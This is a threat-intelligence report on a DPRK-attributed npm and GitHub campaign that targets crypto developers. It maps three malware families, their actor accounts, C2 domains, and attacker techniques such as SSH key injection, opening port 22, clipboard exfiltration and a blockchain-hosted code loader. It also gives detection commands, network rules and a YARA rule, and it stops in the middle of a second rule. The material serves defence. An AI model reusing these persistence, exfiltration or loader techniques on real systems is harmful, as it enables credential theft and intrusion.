
Mapping The Contagious Trader Delivery Network

Alessandra Rizzo

Executive Summary

North Korean threat actors are targeting cryptocurrency developers through a large-scale software supply chain campaign that combines malicious npm packages, GitHub repositories, and social media promotion.

Panther's npm threat scanner identified over 50 malicious packages embedded across more than 100 GitHub repositories targeting developers in the Polymarket, PancakeSwap, PumpFun/Solana, Hyperliquid, Kalshi, and general Ethereum Virtual Machine (EVM) ecosystems.

The packages are operated by 30+ throwaway npm personas and rotate across 20+ command-and-control domains at time of writing.

The packages fall into three distinct DPRK malware families:

  • PromptMink, an LLM-generated infostealer named by ReversingLabs, exfiltrates wallet keys, environment secrets, and SSH credentials.

  • ClipViper, which we have named for this report, is a persistent Windows clipboard stealer deployed through a multi-layer dependency chain.

  • OtterCookie, documented in our separate report, is a credential exfiltration and SSH backdoor toolchain.

The malicious repositories are promoted through verified accounts on X and Reddit, use spoofed developer identities and bot-inflated star counts to appear legitimate, and are distributed across 40+ GitHub users and organizations as redundant delivery fronts.

Automated package scanners miss the attack because the malicious payload sits one to three dependency hops deep; the visible code passes review while the malware lives in a sub-dependency.

We attribute the activity with high confidence to DPRK / Famous Chollima as part of the Contagious Trader campaign, with IoCs corroborated by findings from KMSec, ReversingLabs, OTX, and independent researchers including @stephenlacy and @MalwareUtkonos. Contagious Trader is the name assigned to the cluster of npm-poisoning activity targeting crypto trading bot developers.


Attack Chain

The attack chain depicted above follows a consistent pattern: malicious npm packages are embedded as dependencies in crypto trading bot GitHub repositories, promoted through social media and SEO-optimized READMEs. When a user clones the repo and runs npm install, the typosquatted dependency silently executes the payload.

The operators maintain parallel GitHub orgs as redundant delivery fronts. When one gets taken down, the others continue serving the same payload.

The campaign uses two distinct techniques to make malicious repositories look authored by trusted developers: outright identity theft of real contributors and per-commit attribution spoofing via $(git config user.name) shell injection.


Campaign Timeline

The campaign began on February 19, 2026, when PromptMink's first two packages (npm-eslint-helper and bn-eslint.js) were published within 90 seconds of each other. OtterCookie followed the next day with npm-doc-builder.

Activity escalated sharply in April, with 23 new packages published, more than double March's output. The most intense burst came between April 21 and 23, when 10 packages across all three clusters appeared in roughly 30 hours, including the first ClipViper payload.

As of May 11, the campaign shows no signs of slowing. Nine new packages have appeared in the first eight days of the month, a pace that would exceed April's rate. Packages like pino-pretty-logger, api-ts-utils, and npm-doc-dev are still receiving fresh versions, indicating the operators are actively maintaining deployed infrastructure and victim acquisition is ongoing.


Contagious Interview and Contagious Trader: Converging Toolsets

The three malware families in this report trace back to nominally separate DPRK campaigns that increasingly share infrastructure. OtterCookie was originally a Contagious Interview payload, deployed through fake job lures.

ReversingLabs documented PromptMink as a distinct campaign by Famous Chollima, noting that its packages overlap significantly with Contagious Trader.

Our findings confirm that overlap: PromptMink is the dominant family in the Trader delivery network, embedded across 45+ GitHub repos through packages like bn-eslint.js, chalks-logger, prettier-logger, and a dozen other typosquats. OtterCookie appears in Trader repos via packages from a.yal.a.da.ve7, al.lanjaysa.t.i.a.gi, and alberto1114.

Multiple teams have observed this convergence independently. GitLab Threat Intelligence assessed that DPRK malware activity involves distinct teams operating in parallel, based on branching distribution techniques, infrastructure, and malware variants. BlueVoyant described a two-pronged model: targeted fake job offers on one side, broad npm poisoning through crypto bot repos on the other.


The Bait

Malicious repositories don't find victims on their own. The campaign relies on social media promotion to drive developers toward the poisoned repos, making the promotion layer as critical to the kill chain as the malware itself.

We confirmed two X accounts actively promoting malicious GitHub repositories linked to the Contagious Trader campaign. Many more promotional posts likely exist, but tracking is difficult because a significant number of the repos they reference have already been taken down.

Figure 1: Screenshot of X post promoting malicious DPRK-attributed GitHub repository

The promoting profiles appear "verified" with large follower counts, likely inflated by bots. Whether these are DPRK-operated, paid promoters, or unwitting amplifiers, the effect is the same.

Figure 2: Screenshot of verified X profile responsible for the post in Figure 1

In one case, the verified account @RepoGems promoted a repo from Krypto-Hashers-Community, a confirmed PromptMink delivery org that imported bn-eslint.js.

The GitHub org has been taken down, but the promotional tweet remains live. The social media layer persists independently of the GitHub infrastructure it promotes.

We have identified one Reddit instance suggesting the same playbook extends beyond X. In the r/PredictionsMarkets subreddit, a post covering strategies to earn $100K a month received several comments from user Miserable_Variety277 that directly link to a malicious repository.

Figure 3: Screenshot of the r/PredictionsMarket subreddit comments promoting a malicious DPRK-attributed GitHub repository

The repository linked in those comments, which now redirects to polymarket-btc-5min-15min-arbitrage-trading-bot, is still live with its most recent commit published on May 8, 2026, and imports emojiprint-logger, a PromptMink package that appears in the KMSec feed as recently as May 3.

We can't confidently assess whether these are unwitting amplifiers or DPRK personas.


The GitHub delivery network

The network spans over 100 repositories distributing malware through NPM dependency poisoning. These repos follow the pattern documented by KMSec in the Contagious Trader campaign, targeting Polymarket, PumpFun, Solana, Hyperliquid, and others.

DPRK Developer Personas

One of the most interesting accounts we have tracked in this campaign is lorine93s, which appears on GitHub and NPM. Although the NPM email does not match the GitHub email we found on their profile, the username is the same.

The account is extremely well-polished with a professional developer persona, with links to a personal portfolio hosted on Vercel.

Whether any of this is authentic cannot be verified; the GitHub account may simply be compromised.

The account is responsible for several malicious repositories importing DPRK-attributed packages. As of May 11, 2026, the repositories hosted on this account are updated every few days.

Figure 4: Screenshot of the lorine93s GitHub account

Developer Identity Spoofing and Theft

A sample of repositories revealed that malicious commits are attributed to legitimate open-source developers via $(git config user.name) shell injection. One malicious commit spoofing a known Swedish open-source contributor carries a +0900 timezone offset (UTC+9, consistent with the Korean peninsula). We cross-referenced the claimed developer with their public GitHub activity and found no history of commits to any of the malicious repositories.

In one of the repositories we analyzed, screenshotted below, the commit author field reads $(git config user.name), a failed shell injection that exposes the spoofing technique.

The second technique is outright identity theft. The gigi0500 GitHub account (six PumpFun-themed delivery repos) operates under a stolen developer's name, location, and profile photo with 119 repositories and 283 followers.
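As an added example (not code from this report), the Python script below turns the two attribution artifacts described above into a triage check over git log output: a literal, unexpanded $(git config user.name) in the author field, and a +0900 offset on the author date. The sample log, its hashes and its addresses are constructed placeholders. The offset check is a prioritisation signal for review, not an attribution on its own.

```python
"""Triage git commit metadata for the two attribution-spoofing artifacts the
report describes: a literal, unexpanded $(git config user.name) left in the
author field, and a +0900 timezone offset on the author date.

Added example, not code from the report. It consumes the output of
    git log --format='%H%x1f%an%x1f%ae%x1f%ai'
(fields separated by the ASCII unit separator so names containing spaces
parse cleanly). SAMPLE_LOG below is constructed: the hashes, names and
addresses are placeholders, not indicators from the report.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import Iterator, List, Tuple

GIT_FORMAT = "%H%x1f%an%x1f%ae%x1f%ai"

# An author field that still contains $(...) or `...` means a shell
# substitution was written into the commit metadata without being expanded.
UNEXPANDED_SUBSTITUTION = re.compile(r"\$\([^)]*\)|`[^`]*`")

# Offsets that warrant a second look. +0900 is the one the report calls out;
# it is a triage signal (Korea shares the offset with Japan), not proof.
SUSPECT_OFFSETS = {"+0900"}


@dataclass(frozen=True)
class Finding:
    commit: str
    author: str
    reason: str


def parse_git_log(text: str) -> Iterator[Tuple[str, str, str, str]]:
    """Yield (hash, author name, author email, author date) per log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\x1f")
        if len(parts) != 4:
            raise ValueError(f"unexpected git log line: {line!r}")
        yield parts[0], parts[1], parts[2], parts[3]


def audit_commits(log_text: str, suspect_offsets=SUSPECT_OFFSETS) -> List[Finding]:
    """Return one Finding per (commit, indicator) pair found in the log."""
    findings = []
    for commit, name, email, date in parse_git_log(log_text):
        author = f"{name} <{email}>"
        if UNEXPANDED_SUBSTITUTION.search(name) or UNEXPANDED_SUBSTITUTION.search(email):
            findings.append(Finding(commit, author, "unexpanded shell substitution in author field"))
        # %ai ends with the numeric offset, e.g. "2026-04-22 19:07:41 +0900"
        offset = date.rsplit(" ", 1)[-1]
        if offset in suspect_offsets:
            findings.append(Finding(commit, author, f"author date offset {offset}"))
    return findings


def audit_repo(path: str) -> List[Finding]:
    """Run the audit against a cloned repository on disk."""
    log = subprocess.run(
        ["git", "-C", path, "log", f"--format={GIT_FORMAT}"],
        capture_output=True, text=True, check=True,
    ).stdout
    return audit_commits(log)


# Constructed sample: three commits, the second carrying both artifacts and
# the third only the offset. Hashes and addresses are placeholders.
SAMPLE_LOG = "\n".join(
    "\x1f".join(row)
    for row in [
        ("a" * 40, "Jane Maintainer", "jane@example.invalid", "2026-04-22 10:15:00 +0200"),
        ("b" * 40, "$(git config user.name)", "dev@example.invalid", "2026-04-22 19:07:41 +0900"),
        ("c" * 40, "Known Contributor", "known@example.invalid", "2026-04-23 08:00:00 +0900"),
    ]
)

if __name__ == "__main__":
    for f in audit_commits(SAMPLE_LOG):
        print(f"{f.commit[:12]}  {f.reason:<48} {f.author}")
```

Run audit_repo("path/to/clone") against a freshly cloned bot repository before running npm install; any commit flagged for the substitution artifact is worth cross-referencing against the claimed author's public activity, as described above.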

Malicious Imports

The malicious payloads are imported in one or both of two ways: a direct dependency listing in package.json, or a direct import in /src/index.ts.

Figure 5: Malicious NPM import via dependency listing in package.json

Figure 6: Malicious NPM import via createRequire

Repository descriptions are packed with crypto-related keywords to game SEO.

Figure 7: GitHub repository description pattern of SEO stuffed keywords

The repositories serve as delivery fronts for PromptMink, ClipViper, and OtterCookie.

In one case, a single repo imported both bn-eslint.js (PromptMink) and web-http-errors (ClipViper), hitting the developer with both payloads simultaneously.

That repo, tied to CashBlazorLab, was the one promoted in the X post above by @Atenov_D. Most others import one of the three families. Several are forks of each other — the ClipViper section below covers a 40+ fork chain.

The count is not exhaustive. Given the scale of the operation within a single crypto ecosystem, there are likely other targeted ecosystems we have not yet mapped. In one instance, a repository claimed to use OpenClaw as a Polymarket trading bot through this same delivery network.

Figure 8: DPRK-attributed GitHub Repository leveraging OpenClaw keywords

PromptMink Cluster

The repositories in this cluster deliver the credential stealer malware PromptMink, recently documented by ReversingLabs, who tracked its evolution from obfuscated JS to SEA binaries to compiled Rust payloads over seven months. It was built from scratch using LLM-generated code and is distinct from OtterCookie, BeaverTail, and InvisibleFerret.

In our samples, the payload exports a from_str() function that recursively scans the working directory for .env, config.toml, and id.json files, then uploads them to C2 servers via /api/validate/* endpoints.

Most also inject an attacker SSH key into ~/.ssh/authorized_keys and open port 22 via sudo ufw allow 22/tcp for persistent remote access.

The same from_str() exfiltration pattern appears in npm-eslint-helper, which is the payload behind the bn-eslint.js typosquat distributed across the GitHub delivery network, connecting the delivery repos directly to this cluster.

PromptMink Actor Network

We map the NPM actor network distributing the PromptMink malware family below.

| Actor | Packages | Notes |
|---|---|---|
| lorine93s | picocolor-logger, pinky-logger, chalks-logger, chalk-pro-logger, emojiprint-logger, chalki-pretty | Continuation of sleek-pretty. Two SSH keys rotated across versions. C2 domains A/B tested simultaneously. chalki-pretty links to OTX-confirmed DPRK infrastructure. |
| npmpodev0707 | styled-text-logger | OTX-confirmed DPRK C2. Exfiltrates file contents in batches of 50. RSA key po@DESKTOP-EDKDDLL links to devking1616. |
| devking1616 | color-logger-console | KMSec-confirmed C2. First socket.io transport in this campaign. podev email prefix mirrors npmpodev0707. |
| amauri_jesus | bn-eslint.js, npm-eslint-helper | Same from_str() exfil technique. bn.js typosquat distributed across 20+ GitHub repos. cashblaze1001 email links to CashBlazorLab. |
| rafinhossian | big256-ts, npm-doc-dev | Two-layer chain: big256-ts (big.js typosquat) loads npm-doc-dev. 7+ versions, 82 downloads/wk. |
| y.rix.elfi.e.co | ts-relayer-pub | New actor, new C2 domain. Same from_str() + file targets + UDP IP probe. |
| cryptopawsol | logger-beauty | KMSec watchlist. 302 downloads/wk. |
| soju_dev | pino-pretty-logger | Same SSH + file exfil + /api/validate/ pattern. |
| aleksislabs | prettier-logger, polymarket-onchain-sdk | SSH backdoor + infostealer. Outlook email (unusual for this campaign). polymarket-onchain-sdk is a direct Polymarket SDK typosquat. |
| maklionelox | polymarket-onchain-plugin | Polymarket SDK typosquat. Same from_str() pattern. |
| moduler | ts-moduler | Delivered via tradebothub/polymarket-trading-bot. |
| ffffrakyevin | api-node-utils, api-ts-utils (v3.x), typescript-util-core | Cluster migration from ClipViper (see ClipViper table). Same from_str() exfil pattern wrapped in deceptive export names (check_if_matches, search_hashes, verify_hash) to blend with finance-themed host packages. UDP probe to 8.8.8.8 for IP discovery. C2: polymarkettrading[.]vercel[.]app/api/v1. |

ClipViper Cluster

We are introducing the name ClipViper for this cluster. To our knowledge, no public reporting has previously assigned it a family name. It distributes a Windows clipboard stealer we had not seen in DPRK's toolset, delivered through 40+ repositories as of publication.

The malicious behavior was first identified by @MalwareUtkonos on X on May 2nd, in a comment under the fraudulent X post promoting the GitHub repo that imports the malicious npm package.

The ffffrakyevin actor bridges both clusters. Early versions of api-ts-utils (v1.0.0-2.1.4) delivered ClipViper, while later versions (v3.x) switched to PromptMink. Identical build artifacts (the prettier-lint/ directory and cdll-run-hidden.vbs dev paths) confirm this is the same operator as kunwarshivam1971.

Figure 9: MalwareUtkonos on X posting evidence of the malicious behavior found on the CashBlazorLab repository, advertised in Figure 1

On execution, the stealer:

  1. Sends an install beacon ({"text": "installed"}) to nonce-link[.]vercel[.]app/api/nonce for real-time victim counting

  2. Copies itself to %LOCALAPPDATA%\prettier-lint\cdll.mjs and launches as a detached child process

  3. Creates cdll-run-hidden.vbs to suppress the console window

  4. Registers a scheduled task named CdllProtect (mimicking a system protection service) for persistence

  5. Creates .cdll-clipboard-worker.lock in the user profile to prevent duplicate instances

  6. Continuously monitors the clipboard and exfiltrates contents to the C2

The ClipViper delivery network operates under the Chain-Ether-Core, Infranova-Labs, and Cryptonerva GitHub organizations, forking CashBlazorLab's repo into 40+ copies with auto-generated names (system-lab-5857, data-pipeline-system-4275, sync-batch-lab-5312), each with ~1k bot-inflated stars and SEO-spammed descriptions.

The main delivery technique is listing web-http-errors as a direct dependency in package.json, making them ClipViper-only delivery fronts. web-http-errors hides its malicious behavior in a transitive dependency, prettier-resolver. The clipboard stealer payloads live in prettier-lint/.

Figure 10: Screenshot of the ClipViper directory and payloads from the live NPM registry.


ClipViper Actor Network

| Actor | Packages | Notes |
|---|---|---|
| ffffrakyevin | api-ts-utils (v1.0.0–2.1.4) | Confirmed same operator as kunwarshivam1971 via identical build artifacts (prettier-lint/ directory, cdll-run-hidden.vbs dev paths). nonce-link C2 bridges to kunwarshivam1971 and danlo00holoden. Migrated to PromptMink at v3.x and added two new packages; see PromptMink table. |
| kunwarshivam1971 | prettier-resolver, web-http-errors, http-errors-cli | Clipboard stealer payload. First to publish at 07:24 UTC April 21. Six malicious versions in 44 minutes. |
| danlo00holoden | classnames-sub-folk, result-type-tool | cashblaze0510 email mirrors CashBlazorLab GitHub org name. Six cover packages in 4-minute burst. result-type-tool chains through classnames-sub-folk as a transitive ClipViper delivery layer. |

OtterCookie Cluster

A third cluster of GitHub repositories distributes the OtterCookie variant we documented in this report. The delivery pattern is the same: one npm account publishes a benign clone of a popular package (often Big.js), which imports a malicious dependency from the same author. The key difference is depth. From the GitHub repo's package.json, the malicious payload sits three dependency hops deep.

OtterCookie Actor Network

Note that only actors new to this cluster are listed in the table below. For the full list of OtterCookie IoCs, read our previous report.

| Actor | Packages | Notes |
|---|---|---|
| a.yal.a.da.ve7 | bigint.os, lint-null | Dotted-name actor. Two pairs of two-layer big.js typosquat chains. Same obfuscation framework as OtterCookie samples. |
| n.ar.a.tat.ia.n.aaa | mjs-biginteger, ts-lint-builders | Dotted-name actor. big-integer typosquat paired with payload. Shared payload hash bcfb01ee... with st-bigintr and cjs-biginteger. |
| al.lanjaysa.t.i.a.gi | npm-doc-builder | Dotted-name actor. C2 confirmed as OtterCookie infrastructure. Also documented in OtterCookie report. |
| a.n.n.as.ibal2.36 | st-bigintr, sjs-builder | Dotted-name actor. Payload hash bcfb01ee... shared with mjs-biginteger and cjs-biginteger. Solana devnet API abused as C2. |
| ca.r.lane.es1.2.6 | cjs-biginteger, ts-lint-builds | Dotted-name actor. Same payload hash bcfb01ee... as st-bigintr and mjs-biginteger. ts-lint-builds confirmed malicious in scanner data. |
| ayal.a.d.av.e.7 | sjs-builders, st-biginteger | Dotted-name actor. Near-identical username to a.yal.a.da.ve7. Previously misattributed. Separate npm account with distinct package set. |
| alberto1114 | lint-builder-logger, ts-big-lib, levex-press | Known actor from 108-packages report. lint-builder-logger is an unobfuscated OtterCookie Rosetta Stone (from_str_1/from_str_2 dual chain). levex-press pivots to bare-IP C2. Reuses documented OtterCookie infrastructure. |
| digoschristiann | npm-builders, ts-lint-builder | Dotted-name email pattern (googlemail[.]com). Unobfuscated OtterCookie payload. Shared C2 with alberto1114 and al.lanjaysa.t.i.a.gi. ts-lint-builder confirmed malicious in scanner data, 204 weekly downloads. |
| a.l.l.a.nh.orca0.7 | bjs-lint-builders | New actor not in prior reporting. Dotted Gmail rotation pattern. Package contacted cloudflareinsights[.]vercel[.]app, a confirmed OtterCookie C2 shared with npm-doc-builder and npm-builders. |
| jofarc | awesome-cli-builders, awesome-cli-logger, rjs-biginteger | Two-layer chain: rjs-biginteger (big-integer typosquat) loads awesome-cli-builders. awesome-cli-logger confirmed malicious in scanner data. |


Shifting Techniques, a Cat and Mouse Game

As npm scanners improve, the operators adapt.

On May 7, the a.n.n.as.ibal2.36 actor stripped both st-bigintr and sjs-builder down to identical 26-line loaders. The previous versions were full OtterCookie payloads, with 52 kB of obfuscated JavaScript disguised as big.js clones, complete with README and LICENSE files. The new versions contain nothing but a fetch call to the Solana devnet API, which retrieves executable code stored in a blockchain account (4WF8QCFEnVD7BLs3QAVe2SjxRZ4n3EboCsdhj363VAqZ), decodes it from base64, and runs it via new Function().

The npm package now contains no malicious code at all. The payload lives on-chain, where it can be updated without publishing a new package version, and where most static scanners cannot follow.

Figure 11: Solana-based loader


Takeaways & Recommendations

The boundaries between these campaigns are dissolving. IoCs from both Contagious Trader and Contagious Interview should be treated as a single threat.

The malware comes from a small set of operators. The delivery vectors don't. We've seen GitHub orgs get taken down while the same packages keep landing in new repos within hours.

If you cloned a crypto trading bot from GitHub in the past six months, check it against the IoCs in this report. If you ran npm install on a repo you found through social media, assume compromise until proven otherwise.

The full package list, repository table, C2 infrastructure, SSH keys, and detection queries are provided to support immediate triage.


Detection

Linux and Mac

Save the keys from the SSH Keys section to keys.txt, then:

grep -Ff keys.txt ~/.ssh/authorized_keys /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys 2>/dev/null

Check for the ufw allow 22/tcp artifact on hosts that don't run SSH:

sudo ufw status | grep "22/tcp"

Hunt for the from_str() exfil pattern, including the deceptive aliases used by ffffrakyevin:

grep -rE "function (from_str(_[12])?|check_if_matches|search_hashes|verify_hash)\s*\(" node_modules/ 2>/dev/null

Windows

schtasks /query /tn "CdllProtect" 2>$null
Get-ChildItem "$env:LOCALAPPDATA\prettier-lint\" 2>$null
Get-ChildItem "$env:USERPROFILE\.cdll-clipboard-worker.lock" 2>$null

Pre-install

  • Block every package in the IoC table at your SCA tool or private registry mirror.

  • Audit lockfiles for transitive hits. ClipViper's web-http-errors pulls prettier-resolver; OtterCookie chains nest three deep.

  • In cloned repos, flag commits with +0900 timezone offsets or a literal $(git config user.name) in the author field.
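The lockfile audit in the second bullet is the step that catches what a package.json review misses, because it has to follow npm's nesting rules to reach a payload one to three hops down. The Python script below is an added example (not tooling from this report) that walks a package-lock.json of lockfileVersion 2 or 3 from the root package, resolves each dependency the way npm does (nearest enclosing node_modules, walking up), and prints the chain to every blocklisted package. BLOCKLIST holds names taken from the tables in this report and is a starting point, not the full IoC list; SAMPLE_LOCK and its version numbers are constructed.

```python
"""Walk a package-lock.json (lockfileVersion 2 or 3) and report every
blocklisted package npm would install, together with the dependency chain
that pulls it in, so a transitive payload is found even when the visible
package.json looks clean.

Added example, not code from the report. BLOCKLIST holds package names taken
from the report's tables (a starting point, not the full IoC list).
SAMPLE_LOCK is constructed and its version numbers are placeholders.
"""
import json
from collections import deque
from typing import Dict, List, Optional

BLOCKLIST = {
    # PromptMink
    "bn-eslint.js", "npm-eslint-helper", "big256-ts", "npm-doc-dev",
    "chalks-logger", "prettier-logger", "emojiprint-logger", "pino-pretty-logger",
    # ClipViper
    "web-http-errors", "prettier-resolver", "http-errors-cli",
    "classnames-sub-folk", "result-type-tool", "api-ts-utils",
    # OtterCookie
    "npm-doc-builder", "st-bigintr", "sjs-builder", "lint-builder-logger",
}

DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")


def resolve(packages: Dict[str, dict], from_key: str, name: str) -> Optional[str]:
    """Return the lockfile key npm's resolution picks for `name` required by
    the package stored at `from_key`: the nearest enclosing node_modules that
    contains it, walking up toward the root entry ("")."""
    base = from_key
    while True:
        candidate = f"{base}/node_modules/{name}" if base else f"node_modules/{name}"
        if candidate in packages:
            return candidate
        if not base:
            return None
        cut = base.rfind("/node_modules/")
        base = base[:cut] if cut != -1 else ""


def find_blocklisted(lock: dict, blocklist=BLOCKLIST) -> Dict[str, List[str]]:
    """Breadth-first walk from the root package. Returns {lockfile key:
    shortest chain of name@version from the root} for every blocklisted
    package reachable from the root, at any depth."""
    if "packages" not in lock:
        raise ValueError("lockfileVersion 1 has no 'packages' map; regenerate with npm >= 7")
    packages = lock["packages"]
    hits: Dict[str, List[str]] = {}
    seen = {""}
    queue = deque([("", [])])
    while queue:
        key, chain = queue.popleft()
        entry = packages.get(key, {})
        for field in DEP_FIELDS:
            for name in entry.get(field, {}):
                target = resolve(packages, key, name)
                if target is None or target in seen:
                    continue
                seen.add(target)
                step = f"{name}@{packages[target].get('version', '?')}"
                if name in blocklist:
                    hits[target] = chain + [step]
                queue.append((target, chain + [step]))
    return hits


def audit_lockfile(path: str) -> Dict[str, List[str]]:
    """Load a package-lock.json from disk and run the walk."""
    with open(path, encoding="utf-8") as fh:
        return find_blocklisted(json.load(fh))


# Constructed lockfile: a bot repo listing web-http-errors directly, which
# pulls prettier-resolver one hop down. Versions are placeholders.
SAMPLE_LOCK = {
    "name": "sample-trading-bot", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"express": "^4.18.2", "web-http-errors": "^1.0.0"},
             "devDependencies": {"typescript": "^5.0.0"}},
        "node_modules/express": {"version": "4.18.2"},
        "node_modules/typescript": {"version": "5.4.0"},
        "node_modules/web-http-errors": {"version": "1.0.3",
                                         "dependencies": {"prettier-resolver": "^1.0.0"}},
        "node_modules/web-http-errors/node_modules/prettier-resolver": {"version": "1.0.1"},
    },
}

if __name__ == "__main__":
    for key, chain in find_blocklisted(SAMPLE_LOCK).items():
        print(f"{key}: {' -> '.join(chain)}")
```

Run audit_lockfile("package-lock.json") on the cloned repo before npm install. A repository with no lockfile gives you nothing to audit; generate one with npm install --package-lock-only (which resolves without running install scripts) and audit that.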

Network

Block every entry in the C2 table at the DNS or proxy layer. From node or npm processes, flag any of the following:

  • UDP to 8.8.8[.]8:53 with zero bytes sent (PromptMink IP discovery primitive)

  • HTTP to api.ipify[.]org, checkip.amazonaws[.]com, icanhazip[.]com, or ifconfig[.]me

  • POST to /api/validate/* or /api/v1 on a .vercel.app host (PromptMink exfil)

  • POST to /api/nonce with body {"text": "installed"} (ClipViper install beacon)

  • HTTPS to api.devnet.solana[.]com during npm install (OtterCookie on-chain loader)

  • GET to /api/ssh-key, /api/scan-patterns, or /api/block-patterns from a node process (OtterCookie config fetch)

  • POST to /api/v1 on a bare IP from a node process (OtterCookie file exfil)
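The list above reads as a rule set once egress telemetry carries the originating process. As an added example (not detection content from this report), the Python below encodes each indicator as a rule scoped to node/npm processes and runs them over JSON-lines connection records. The record field names (process, proto, host, dport, method, path, body, bytes_out) are this example's own and would map onto whatever your proxy or EDR emits; SAMPLE_EVENTS is constructed, the .vercel.app host in the exfil event is a placeholder, and 203.0.113.10 is a documentation address.

```python
"""Match outbound connections from node/npm processes against the network
indicators listed above and emit one alert per matched indicator.

Added example, not code from the report. It assumes egress telemetry has
already been normalised into JSON lines with the fields process, proto,
host, dport, method, path, body and bytes_out (field names are this
example's own). SAMPLE_EVENTS is constructed; the c2-placeholder host is
a placeholder and 203.0.113.10 is a documentation address.
"""
import ipaddress
import json
from typing import Dict, List, Tuple

NODE_PROCESSES = {"node", "npm", "npx"}
IP_LOOKUP_HOSTS = {"api.ipify.org", "checkip.amazonaws.com", "icanhazip.com", "ifconfig.me"}
OTTERCOOKIE_CONFIG_PATHS = {"/api/ssh-key", "/api/scan-patterns", "/api/block-patterns"}


def is_bare_ip(host: str) -> bool:
    """True when the Host is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_install_beacon(body) -> bool:
    """True only for the exact {"text": "installed"} ClipViper beacon body."""
    if not body:
        return False
    try:
        return json.loads(body) == {"text": "installed"}
    except ValueError:
        return False


def classify(ev: Dict) -> List[str]:
    """Return the indicator names one event matches; empty if none. Every
    rule is scoped to node/npm so browser traffic to the same hosts is quiet."""
    if ev.get("process") not in NODE_PROCESSES:
        return []
    proto = ev.get("proto", "").lower()
    host = ev.get("host", "").lower()
    path = ev.get("path", "")
    method = ev.get("method", "").upper()
    hits = []
    if proto == "udp" and host == "8.8.8.8" and ev.get("dport") == 53 and ev.get("bytes_out", 0) == 0:
        hits.append("promptmink_udp_ip_probe")
    if proto in ("http", "https"):
        if host in IP_LOOKUP_HOSTS:
            hits.append("external_ip_lookup")
        if method == "POST" and host.endswith(".vercel.app") and (path.startswith("/api/validate/") or path == "/api/v1"):
            hits.append("promptmink_exfil")
        if method == "POST" and path == "/api/nonce" and is_install_beacon(ev.get("body")):
            hits.append("clipviper_install_beacon")
        if host == "api.devnet.solana.com":
            hits.append("ottercookie_onchain_loader")
        if method == "GET" and path in OTTERCOOKIE_CONFIG_PATHS:
            hits.append("ottercookie_config_fetch")
        if method == "POST" and path == "/api/v1" and is_bare_ip(host):
            hits.append("ottercookie_file_exfil")
    return hits


def scan(lines) -> List[Tuple[str, str, str]]:
    """Run classify over JSON-lines telemetry; returns (ts, process, indicator)."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        for name in classify(ev):
            alerts.append((ev.get("ts", ""), ev["process"], name))
    return alerts


# Constructed telemetry: five hits, one browser event that must stay quiet,
# one benign registry fetch, then an IP lookup from node.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"ts": "T1", "process": "npm", "proto": "udp", "host": "8.8.8.8", "dport": 53, "bytes_out": 0},
    {"ts": "T2", "process": "node", "proto": "https", "host": "nonce-link.vercel.app", "dport": 443,
     "method": "POST", "path": "/api/nonce", "body": json.dumps({"text": "installed"})},
    {"ts": "T3", "process": "node", "proto": "https", "host": "c2-placeholder.vercel.app", "dport": 443,
     "method": "POST", "path": "/api/validate/env"},
    {"ts": "T4", "process": "node", "proto": "https", "host": "api.devnet.solana.com", "dport": 443,
     "method": "GET", "path": "/"},
    {"ts": "T5", "process": "node", "proto": "http", "host": "203.0.113.10", "dport": 80,
     "method": "POST", "path": "/api/v1"},
    {"ts": "T6", "process": "chrome", "proto": "https", "host": "api.ipify.org", "dport": 443,
     "method": "GET", "path": "/"},
    {"ts": "T7", "process": "node", "proto": "https", "host": "registry.npmjs.org", "dport": 443,
     "method": "GET", "path": "/express"},
    {"ts": "T8", "process": "node", "proto": "https", "host": "api.ipify.org", "dport": 443,
     "method": "GET", "path": "/"},
]]

if __name__ == "__main__":
    for ts, proc, name in scan(SAMPLE_EVENTS):
        print(f"{ts}  {proc:<6} {name}")
```

The external_ip_lookup rule is the noisiest of the set, since legitimate tooling also asks for its public address; pairing it with the UDP probe or a later POST from the same process is what makes it worth paging on.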

YARA Rules

rule suspicious_ssh_persistence {
    meta:
        description = "Source attempts to inject an SSH key into authorized_keys, open the SSH port at the firewall, or take ownership of ~/.ssh — persistence and lateral-movement setup"
        author = "PantherLabs"
    strings:
        // authorized_keys as a write target. Paired with a write primitive
        // in the condition
        $authorized_keys = "authorized_keys" ascii nocase

        // Write primitives that could append a key
        $fs_write       = "writeFileSync" ascii
        $fs_append      = "appendFileSync" ascii
        $fs_write_async = /fs\.write\s*\(/ ascii
        $fs_open_append = /\{[^}]{0,60}flag\s*:\s*['"][aw]\+?['"][^}]{0,60}\}/ ascii

        // Public key format literals — "ssh-rsa AAAA" and "ssh-ed25519 AAAA"
        // are fixed header+base64-prefix so they're cheap to match and
        // almost never appear in legitimate code outside of SSH-mgmt tools.
        $pubkey_rsa     = "ssh-rsa AAAA" ascii
        $pubkey_ed25519 = "ssh-ed25519 AAAA" ascii
        $pubkey_ecdsa   = "ecdsa-sha2-nistp256 AAAA" ascii

        // Firewall rules opening the SSH port
        $ufw_ssh          = /ufw\s+allow\s+(ssh|22\b)/ ascii nocase
        $firewalld_ssh    = /firewall-cmd\s+--add-(service=ssh|port=22)/ ascii
        $iptables_ssh     = /iptables[^"\n]{1,80}--dport\s+22\b/ ascii
        $windows_fw_ssh   = /netsh\s+advfirewall[^"\n]{1,80}port=22\b/ ascii nocase

        // ~/.ssh ownership manipulation — chown/chmod near .ssh
        $chown_ssh = /chown[^"\n]{1,40}\.ssh/ ascii
        $chmod_ssh = /chmod\s+[67]00[^"\n]{1,40}\.ssh/ ascii

        // sshd_config tampering
        $sshd_config = "sshd_config" ascii

    condition:
        filesize < 1MB and (
            // A public-key literal alone is essentially never legitimate
            any of ($pubkey_*)
            or
            // Writing to authorized_keys with a fs write primitive
            ($authorized_keys and any of ($fs_write, $fs_append, $fs_write_async, $fs_open_append))
            or
            // Opening the SSH port at the firewall
            any of ($ufw_ssh, $firewalld_ssh, $iptables_ssh, $windows_fw_ssh)
            or
            // chown/chmod applied specifically to the .ssh directory
            any of ($chown_ssh, $chmod_ssh)
            or
            // sshd_config edit paired with a write primitive
            ($sshd_config and any of ($fs_write, $fs_append, $fs_write_async))
        )
}
rule NPM_Remote_Code_Loader_HTTP_To_Function
{
